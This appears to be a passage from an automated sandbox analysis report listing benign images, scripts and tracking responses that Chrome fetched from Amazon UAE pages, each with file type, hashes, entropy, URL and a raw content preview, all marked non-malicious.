                                                                                                                                                                                                        Preview:.PNG........IHDR...............>(....tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c132 79.159284, 2016/04/19-13:13:40 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:b3e090dd-84c4-4674-9fe3-59f5a5bd6db7" xmpMM:DocumentID="xmp.did:AB1D71FA873C11E6A935C06C3689B1A4" xmpMM:InstanceID="xmp.iid:AB1D71F9873C11E6A935C06C3689B1A4" xmp:CreatorTool="Adobe Photoshop CC 2015.5 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:f301801f-ea81-4562-919b-633c17b77694" stRef:documentID="adobe:docid:photoshop:9b6ca99e-cfa6-1179-9606-c490b53d51cf"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>Z..k../.IDATx..}.x
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):23
                                                                                                                                                                                                        Entropy (8bit):3.914866303883101
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:YIzLKFjJ4:YI/KZJ4
                                                                                                                                                                                                        MD5:E66A7A6C91E2C26803F3F49FEB7A883F
                                                                                                                                                                                                        SHA1:4AE440FF2BD4594A3CACAEB1EDD29444B781A3ED
                                                                                                                                                                                                        SHA-256:8FD54EEE4277F1327015CC0BCAED8A878BF44D1804364CD5D93DFAB9E2D1A5AF
                                                                                                                                                                                                        SHA-512:9A00E2AA47634A1AA8B4234F7692CA71521929EE31A225A460DD5A7BD46F9196F688467B8303C5EF5D6CFF32D25B85F511BD741CE99A3FDA8D76A66591A1DC2E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:{"message":"Not Found"}
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 63x200, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):6618
                                                                                                                                                                                                        Entropy (8bit):7.935032450894638
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:TyRZRMzAuFLIYKl0r5ISYdre8H+R2NV65a38z7TwLwPZbtRd36Wwuw1bR1:O3WdLWk4X429sz7+yvnwzd1
                                                                                                                                                                                                        MD5:D0FD2A84A97736D17DFC1C27766D29EE
                                                                                                                                                                                                        SHA1:1735DDABCD697BE1492DC2471F561FE846F7BC35
                                                                                                                                                                                                        SHA-256:E749AB22E5542C36172B038DB9F858D5226D1B29E97AA4F47AB97D05FD11C9E2
                                                                                                                                                                                                        SHA-512:DF4AC5C28AE9874FE377F76888CA46A66DD788DA607FE228B902EB0B4B925619BE885CEB32A609C38DE70385F9BF28BD1D16FD443D91D2821A5BE65D11E89435
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........?.."..............................................................!...."1.A.2Qa..#B$3Rbd....qr.................................................1..!"Aq.a.................?..k^..r.V.E..:..........."b....C.z.1.l.........!.-.......toKBx..@.&.E.A...:7..Vk..jQ.O,E&*.%..9.0..(. ...f..."..|...........w.....ORHD.oT(k.<.d:D5..URdOz})_.....H..Y...=L..?...!...N0.$..<s.QpV.....?..I:4.V.j...$..Q.,.I.O..!.....w...R...+.P2.......d.?=T..H..)..~...........\..$.I.wSE.."7.IVC^A.B.-*....:....8.~.>...\`..=90..0..@.H...L.......5*k..6.X.]G.......b....`y%eedP..Xe........b.;.D.iwJQg`BC;2"...../.D.*..*.N.L.......v1F.s..H=C....%z.Q+0.9......Wj.........g..\.n-7KMMN.VF...-xa..R(.).I...........w..5....M....Y..|..,+W;.)..j=..RA.....(.i..f.j..;.b\...wT..0.L..=9"...e.W)..d..|.A...t.]..2...Zr..A+..n2.b.).P_dY..@..$......
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:0RPFFN4XC9JAK0QN8ZQ4$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3D0RPFFN4XC9JAK0QN8ZQ4%26ic%3D2%26m%3D1%26sc%3Dcsa%3AbrowserQuiteLd%26pc%3D5136%26at%3D5136%26t%3D1723729121665%26csmtags%3DbrowserQuiteLd%26pty%3DFullPageAuthentication%26spty%3Dclaim%26pti%3Dundefined%26tid%3D0RPFFN4XC9JAK0QN8ZQ4%26aftb%3D1%26lob%3D1:5136
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65449)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):289541
                                                                                                                                                                                                        Entropy (8bit):5.256566666002886
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:xmVqmVg4CumVHpmV9EmVNmVZRmVbVMmV9mVTmVsmVpmVpqqY6W:ESHmCqq6
                                                                                                                                                                                                        MD5:F758C25C0BC4E49CBF9A4C59CB5E3690
                                                                                                                                                                                                        SHA1:2591CC26A97246EDBB1BE9409CFE511D920D34B0
                                                                                                                                                                                                        SHA-256:A412B4E108D2A36D090528AC7A5A2144D1BDF7F7F293467A744864E1E1B6C074
                                                                                                                                                                                                        SHA-512:BC9D21F2BE8A95859E43AD3EDCA45CD54381265E4203E1C8E3FF048004BDBE4F2D0AF24A5B0C241C951776B152500387E9DC18C8E8A8E70264243B5876D88BB8
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/81gec8z2nBL.js
                                                                                                                                                                                                        Preview:/*! For license information please see main-e8dc46bd07f4d453b2cd.min.js.LICENSE.txt */."use strict";(self.discountWidgets=self.discountWidgets||[]).push([[179],{2318:(t,e,r)=>{r(506),r(7147);var n=r(745);function o(t){return o="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t},o(t)}function i(t,e){for(var r=0;r<e.length;r++){var n=e[r];n.enumerable=n.enumerable||!1,n.configurable=!0,"value"in n&&(n.writable=!0),Object.defineProperty(t,(i=n.key,a=void 0,a=function(t,e){if("object"!==o(t)||null===t)return t;var r=t[Symbol.toPrimitive];if(void 0!==r){var n=r.call(t,e||"default");if("object"!==o(n))return n;throw new TypeError("@@toPrimitive must return a primitive value.")}return("string"===e?String:Number)(t)}(i,"string"),"symbol"===o(a)?a:String(a)),n)}var i,a}var a=function(){function t(){!function(t,e){if(!(t instanceof e))throw new Typ
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, baseline, precision 8, 400x39, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):9484
                                                                                                                                                                                                        Entropy (8bit):7.867411824671817
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:q8KIzd4USNdPO/trSgHYDqs0a/6iGwskNpCdqDyP5ve:q8KOd1edPIHUiCqwsEpiPs
                                                                                                                                                                                                        MD5:C8407BB0F31D12AF666791231B078919
                                                                                                                                                                                                        SHA1:B00BD1145454A48D7EEFB8F5251D1ECFDC791012
                                                                                                                                                                                                        SHA-256:2C420C04C72907D95082D29EF4D50DB13D4AD40A44F3649C842CFE5ECBE5B30F
                                                                                                                                                                                                        SHA-512:6B0D4EF1EE10ED92AA320D71C7CD7F24925A2FE0A98D47B433692A342FD25499A7F1DF59F51FCC14BE702095490D3836A954A6E32EBD530497648305FBF7A9F8
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/G/39/AHS_UAE/2022/GW/SWM/CarRental-SWM-en-400x39._CB630585803_.jpg
                                                                                                                                                                                                        Preview:.............................................................................................................................................2....Adobe.d...........'......................................................................................................!...."1A......#$%&Qa'()*23456789:BCDEFGHIJRSTUVWXYZbcdefghijqrstuvwxyz..........................................................................................8S............!....1A..."Q#2aq.........$%&'()*3456789:BCDEFGHIJRSTUVWXYZbcdefghijrstu..vwxyz..........................................................................................?..=..Eb..Xa..1a.,0......b..Xa..1a.,0......b..Xa..1a.,0......b..Xa..1a.,0......b..Xa..1a.,0......b..Xa..1a.,0......b....=..Eb..Xa..1a....c.f..zZ...e..*..._..a.5+B.!.....6...l..k....jt.X.f.9.CS......UW.....*X6..........H...)qK.-*`in[..],.........TD...!NG@.O..`...@..C%.).Zr..d.VS..TU.=.P.y ...($..n..g)..X.w.zi.XL...`..@\C 1..v.%...B......!.T1D8..n...H......8.8/T.S".....F...
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3859
                                                                                                                                                                                                        Entropy (8bit):7.7580495385560475
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:n+Pp+uyDVBPeFZKiaSR2/RZzO4qyD0hM93:n0wdPDVR9qa0Kx
                                                                                                                                                                                                        MD5:47E6362325B51AF9B9A01D855070810B
                                                                                                                                                                                                        SHA1:09E631CD9343A5878566C2368DC7BE4E68E8132D
                                                                                                                                                                                                        SHA-256:E3535F690F9EA1270D88D1DE7B4FCA4AB1D45B19E9241F100477EF32C4CF7651
                                                                                                                                                                                                        SHA-512:41BC909BA4C104D2479B48406702A7A39283778977DFAF8402951BFB0AFD1827953FDC877F1D68F0AB019D188DF754E61994FF2E292BBD71B37C608702F09F21
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF......................................................................................................................................................t...."..........6......................................................................7..............`...b.[w.L...J._]e..k.."..............*...6W..|..Nb...E...f\.dmx..0.......6....DZ..7`...j......4....eN.?k....f. .......-;/....../4./Z~..N.>.&K..Z.{JC...,!...Q........+Mi9..iOg.......XG.7.....w...... ...............U....N..v=....q1...O.................Y.............................%5E.!6Ua..&14@AVe....$7DFQTq..."0PWu........'8Gdtw................?......g..&[.R....9.Q!.. ....\a2...O....s......)75&.?...1s...[.d.5i/.t.2.#n{@cWIP.Y3.[..J.w(,.M.....msGq....2...X5z..k.W.!....!..0.<..8G..h.....D..Q$.2..0.U...5?TF[%5N<...2...\u..4.?J....C......N..S..I2I....n.4.S..C..M.#........&...J.Ri5...d..#....?DG.@.".....@..Kw...u.r.I.-.....p...-..K....c.0..n.+.)......jL.+...Oh..C.....Lc*\....u5...Z.o....C.e....w.`K..S=_
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2772
                                                                                                                                                                                                        Entropy (8bit):7.799625144426949
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:TT0r6gEt81S7MEJbceQbSr4DxqR9e5gjBORCn03fajuU/LBHL2EFSIeg5eAk:Ttt81sfJbceQbe4DsR8gQRC0PaL/NJFM
                                                                                                                                                                                                        MD5:5EEE6881BDF98E2F692FC01BBBFC0543
                                                                                                                                                                                                        SHA1:6DAFA6E6850ED61D720BC9F81236D54957919A83
                                                                                                                                                                                                        SHA-256:5A65C4A1E3666F0CDC917CD1F35F10CACDEC2050633D518007A640D496221D0F
                                                                                                                                                                                                        SHA-512:60E44F0F8724D1F6D4380D818A60ED0D9438FAC00909C6B6438EDF0EA4F7DCA3E4F0AB76E7436FB5C9F98CA0DBD6509A1253A84460CD95913C5D485684A1CBD2
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."...............................................................!.."1AQq.2ar..3s...#$&R%Bb...........................................................!"12A.Qa.34qb..............?..8.........................................[#...]..8..MF...X..;...O.x...%...4....|g..u$?sI.3....../q...T.mee..v..AB..91.?..fn.E+.x.?.,.i...5.-..CF.zO........."s.X.......2.~..zD..5r..k.C.`M.h.%..`.......ua...,.......CT."........s$.S.%\~.........Y......,m..)..u.]Z..TY.:j...Z...a..s4=cW.UJ..1E.T...Q...GVO5..y....>".k0Jz.p...?G.:...X.5.X..J../.SJ.C...u.....F..v..Z.h.."n.....RTgwd...........*..Ui.N[..3..HTS...7E.E.MB..0K.b.Fb.CTC..Y.,&aw.D................>.......|h...E...j\%$..2..RS.....|.0}.!+....]`...i]..T..J...1..]..S..8o..F.l.:.3...GT..L.h..fv...r.nCys#nwMi..X...k3..r..$.t.....0Oz.sV..w:]e}A......M.....'f.!.f.N.....U.%m..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:HTML document, ASCII text
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):71
                                                                                                                                                                                                        Entropy (8bit):4.19644707821733
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:PouVIZxgRO5ZB1XbZ6iFi:haxUkZ3X96x
                                                                                                                                                                                                        MD5:6AAEF67381946BFC1DDACCA8CF7F6C36
                                                                                                                                                                                                        SHA1:E441BBA8B691AD0FFF0BCCB75974880018AB41D6
                                                                                                                                                                                                        SHA-256:73F8AE8C11DAA6AD905107970E55C3C64CD7133561E9E91E650AAB092BA7245E
                                                                                                                                                                                                        SHA-512:99039B90D4F3819EFB0A395D0DC810DEE1A56265D443D24D1C9BDF832EF9F95887E3C417253698A4F76EF176D0ACE6334905F4B7B4E6A8421D2F650B84255EC2
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.amazon.ae/rd/uedata?rid=B82A0YC1SM3B4A82DCGS&sid=258-1179333-9864664&rx=4wWPW9HYkdIwltxolCvA+A
                                                                                                                                                                                                        Preview:<!DOCTYPE html><html><head><title>x</title></head><body></body></html>.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 1500x600, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):72789
                                                                                                                                                                                                        Entropy (8bit):7.634647649135071
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:T0NX4Y5aRWCQsx+WHNbH4ECH0Ek3mBZyz:TM4TJ+WH14RVxDyz
                                                                                                                                                                                                        MD5:330B2FAD057682E976A81F17D546D487
                                                                                                                                                                                                        SHA1:3FB07541E05B1ECF00C611778D1608318C869FC5
                                                                                                                                                                                                        SHA-256:E68A8B36022CC3CF2C149F376B40930A493C1A0CAC121BF2958A6C82BB99404A
                                                                                                                                                                                                        SHA-512:A548736277A122155A47ED5DC9B468C884B2346B24194CA4C0303C9F73AF0E2FFC84B6BBB9DE6E26ED34AA6D76396CA914EFD89B8E1EE56A8BBA232E05E4D7CB
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..............Exif..II*...............4GJP........4=jumb....jumdc2pa.........8.q.c2pa...4.jumb...Gjumdc2ma.........8.q.urn:uuid:ade21a78-97fe-440d-9390-a45cbec499f2.....jumb...)jumdc2as.........8.q.c2pa.assertions.....jumb...&jumdcbor.........8.q.c2pa.actions.....cbor.gactions..factionkc2pa.editedmsoftwareAgentmAdobe FireflyqdigitalSourceTypexShttp://cv.iptc.org/newscodes/digitalsourcetype/compositeWithTrainedAlgorithmicMedia....jumb...(jumdcbor.........8.q.c2pa.hash.data....|cbor.jexclusions..estart..flength.4Idnamenjumbf manifestcalgfsha256dhashX J..L...5. .V.g....;.....)...cpadI.............jumb...$jumdc2cl.........8.q.c2pa.claim.....cbor.hdc:titleoGenerated imageidc:formatjimage/jpegjinstanceIDx(xmp.iid:55C59422510D11EFA366EADDEB8D89B3oclaim_generatorx6Adobe_Photoshop/25.9.1 adobe_c2pa/0.9.3 c2pa-rs/0.31.0tclaim_generator_info..dnameoAdobe Photoshopgversionf25.9.1.isignaturex.self#jumbf=c2pa.signaturejassertions..curlx'self#jumbf=c2pa.assertions/c2pa.actionsdhashX Ji.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):5046
                                                                                                                                                                                                        Entropy (8bit):7.917923755818709
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:TSa1lL9A7iHikeVA46OnH+Fap8fe3Jc8MZn2gmZG/8NB4luYR1:+aL9A7UEA47eFzfRnrUN0uI1
                                                                                                                                                                                                        MD5:0C1B354B26291D790EAB0387869C277A
                                                                                                                                                                                                        SHA1:55D8F6B724527ABC37A8A3A7FAFDA860489A5569
                                                                                                                                                                                                        SHA-256:3A4A1948DDB9B047EB38208E744A7C8993F58CB518F90E438D3160DF9E5BE965
                                                                                                                                                                                                        SHA-512:918D8BDDFD1ADCC58C2A76DE4955971FE340D0D4537783811DA0010CDD92F0E08011CDA280FA21E689D791691308879F64E2E526D58DFB1D3946DAE1F14107F1
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t....".................................................................!"2AQ...1q.#3a...6BRru...$....4CT................................................!...1A"q.#Q...2...............?..dE...xT./...wW.*T.v/.......*P..C...zT.@O.$...e..M..U.;X.3[\"....q.C...zV...{..-F..."...V..#..|DH.h.A...!.|..6/....@.2T...P..C...zT.@Gb..Jl_!.R.....=).|..J..v/.......*P..C...zT.@Gb..Jl_!.R.....=).|..J..S..!R..u~B.@)JP..3..o....C<..t..&.....7*4G..L...".Lc...~........`.ZgEg....%...J..e..Hv....*vo...F.}...Gs...vk.ou+...8..#VS.&....V.W..R..(..g...R..Q$.!l.F.......Z[v....v...H.)..?.....AR.d..R3.Z...j.....)u,8..?....{I....G.b....5_...V^..h|.Gd..O.|I..:U.J...L.$.C...'Q.F.".(h....s..Y...............)....x..C.)?.....*W.L....ip$.."..B[.0..H.$..V.O@....h..r..[.N.....L....#US.E..O.~B......~....l...t..j.o:...v....../.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):5427
                                                                                                                                                                                                        Entropy (8bit):7.8492577240864
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:9Fg5aG09NSc+f8nYYF76Ge55qbQHmxhQHA90EeCRAYO2iamwVH2YTLzRT+TI2/ex:9FgEEc+f8xV6Ge5MkGxqtEeCROZ1wVfb
                                                                                                                                                                                                        MD5:A84A5BCB2242983B0638541600BBFA37
                                                                                                                                                                                                        SHA1:37ACEA3B1A43937A8A980FBD824695C75FB13289
                                                                                                                                                                                                        SHA-256:7785D4012F96E2BD15FBEF1241B59574B541EC348426AEC92CF965F23ED90C3E
                                                                                                                                                                                                        SHA-512:91D2F8D8923F3C697F9DE2C4A50F6ECBFFB0F950B306A20B3CDF130FCF9D1232A836DF1C99CD69F6DD1A4FC46C1A6AE7651BE7BEEF18A65B6C8AA12487E0DB82
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF......................................................................................................................................................t...."..........9..............................................................................p......8..<...wYj..a..CAu.........bYk%...P....d.<.E..wg......m..z)]..m.k...*NY..9.#....Co5..j...$...../..;lg..p..^Q....Ju.S..U2.*....d.wM5.oh.Be...4CZ...O..Nr......?2li:W...n.....K...C...W6.e..x.....d........Q...g'..}...W..........'.#=...c......~,.1.[^.>..-.....|;m.M..K.mtSp....0...H...q.1..J.M..X.....g..9?'g>FW...............Y...............................!%5.&14Ua..$0AEeq.."'6FQTu..... @BDGdv...7Pf....................?....n....f9.)...$V....b.b......)..........p;.......:....`q.m..fy42...\8!.<..k..xi....[.r.6..c..{*."....{._/.69B.......;...f.M..................eJb..W............t........s1#..Ep.........3#...5.........4.U.C...e.H...e<]..A.u..0>...b..?.X.....'...r.?...).;.....S...:jv|%yzM.\....K.N.DXv.*.3
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (562)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):93236
                                                                                                                                                                                                        Entropy (8bit):5.397125859693619
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:eEIiqW8dnB13P6Av59IWb7lIdGd0NQ1X0L7SjR9dgl/aaRZfLRnChZhpHju90u13:xYcQZMuZ7q9P1+pKbaM
                                                                                                                                                                                                        MD5:7DBD0AF1B1B4C7BE16180F86EF947E6B
                                                                                                                                                                                                        SHA1:A4332F3C2B25B2294A446EE8F9A7CAAE8236201A
                                                                                                                                                                                                        SHA-256:30711CA94E9E52400EC9262D2948EC5CD91230C43EFE4E414A39682ED4782F99
                                                                                                                                                                                                        SHA-512:EA05B2825411E1ADE46877378F01186813B4DC07A8F1E787D51A37CE977D4A0776A46AC49CD4FFE0BA22D2010E104D53397649D097A1FDD369E626F06B2701AC
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/61xJcNKKLXL.js?AUIClients/AmazonUIjQuery
                                                                                                                                                                                                        Preview:/*. jQuery JavaScript Library v1.6.4. http://jquery.com/.. Copyright 2011, John Resig. Dual licensed under the MIT or GPL Version 2 licenses.. http://jquery.org/license.. Includes Sizzle.js. http://sizzlejs.com/. Copyright 2011, The Dojo Foundation. Released under the MIT, BSD, and GPL Licenses... Amazon elects to use jQuery and Sizzle under the MIT license... Date: Mon Sep 12 18:54:48 2011 -0400. Sizzle CSS Selector Engine. Copyright 2011, The Dojo Foundation. Released under the MIT, BSD, and GPL Licenses.. More information: http://sizzlejs.com/.*/.(function(H){var r=window.AmazonUIPageJS||window.P,p=r._namespace||r.attributeErrors,J=p?p("AmazonUIjQuery","AmazonUI"):r;J.guardFatal?J.guardFatal(H)(J,window):J.execute(function(){H(J,window)})})(function(H,r,p){r.navigator&&r.navigator.userAgent&&H.declare("jQuery",function(){function J(a,b,d){if(d===p&&1===a.nodeType)if(d="data-"+b.replace(gb,"-$1").toLowerCase(),d=a.getAttribute(d),"string"===typeof d){try{d="true"===d?!0:"false"===
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):3980
                                                                                                                                                                                                        Entropy (8bit):7.891380073215236
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:TJaRy1POpMZJ/nooLB/ZqywDKLJsCycW6deERC7qiWdiqRk:tKy0ps/PLBcNDKeYjcERmWdlk
                                                                                                                                                                                                        MD5:50EDCD23272D3AA45D16E59EE15272F9
                                                                                                                                                                                                        SHA1:B0309A5663181CFA0A25D9A45A0E8894302CDDCB
                                                                                                                                                                                                        SHA-256:F80B1A0318F80353CE48BD8CD94EE1CC87E995364A49FCCEB19E52BBAEAF8BCC
                                                                                                                                                                                                        SHA-512:20A7FACBE1FCF3FCB043C2A25034420513F94B5CD0B54717115D96018C491999398E949906E44DC3C57A3B57F646CB60D4F024794322228E5EFF9A67E0AE5C09
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/Associates/XCM_Manual_Budget_store_DQC_5b30ed29-b351-4c7c-ae2c-885863964831._SY116_CB613590867_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."............................................................!1.A.."Q2aq......#Br...%3CSs........................................................!1."AQq...2Rar....34b..............?..R...w.JR.%)J...(BR...JR.%)]...o..s.Y..!...<..k...T..;.z..`.am$*......X...k....R./%..A.....@...Z.&....N.$A . ..b..*).[.*TT...JR...3J.S5.!h.JS(.JR.%)J.....3e.a....?...k]s..R.qAm.y>.f.j...-@.g.*..........X.W.u_.c.].`.Gh6.X&.....7........e-k..z..$......}k...@v..I...CZ.....T..e..6.-.]..*B+..:..m.A5.....(..5......B....Y9r......1.1....i.S1=.q...._.".........;r......W......T)W6.A2..m.gU0........#.,qq...&F%...#8n.33#3{.*....x....K...[.}JP.C....".$V......FM.r.....m.hr.....gc5..q.Qq.........Ep...iv.l..C..L.K].?_].U.U..b....n;..a. .....j..Y...u.0.e..9....5.. ..."alm.J.QJ.e.r.EM)BR..B.....JR.%)PD...F.K....].[,.e...&@r ...+.w..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):8724
                                                                                                                                                                                                        Entropy (8bit):7.761883753720958
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:1Wjw/yUNf5ll2HDuQ6V71Jc/sQQN1DvyVGRYfErc9AMFvj0GIqs1:6GmaQi5eQbRY0c9cGIqk
                                                                                                                                                                                                        MD5:7A6C54F0AC32E2B191446B619031115F
